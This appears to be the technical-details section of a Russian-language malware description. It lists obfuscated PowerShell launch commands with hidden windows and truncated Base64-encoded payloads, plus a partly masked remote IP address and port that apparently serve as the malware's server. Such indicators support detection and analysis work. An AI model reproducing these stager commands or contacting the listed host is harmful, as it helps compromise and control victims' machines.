Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) SQBGACgAJABQAFMAVgBFAHIAUwBJAG8ATgBUAEEAQgBsAEUALgBQAFMAVgBlAFIAcwBJAE8ATgAuAE0AQQBqAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBlA...
- '21#.#82.191.193':8001
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAG8ATgBUAEEAQgBsAEUALgBQAFMAVgBlAFIAcwBJAE8ATgAuAE0AQQBqAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBlAEYAXQAuAEEAUwBTAGUAbQBCAGwAWQAuAEcAZQB0AFQAeQBwAGUAKAAn...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) SQBGACgAJABQAFMAVgBFAHIAUwBJAG8ATgBUAEEAQgBsAEUALgBQAFMAVgBlAFIAcwBJAE8ATgAuAE0AQQBqAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBlA... (со скрытым окном)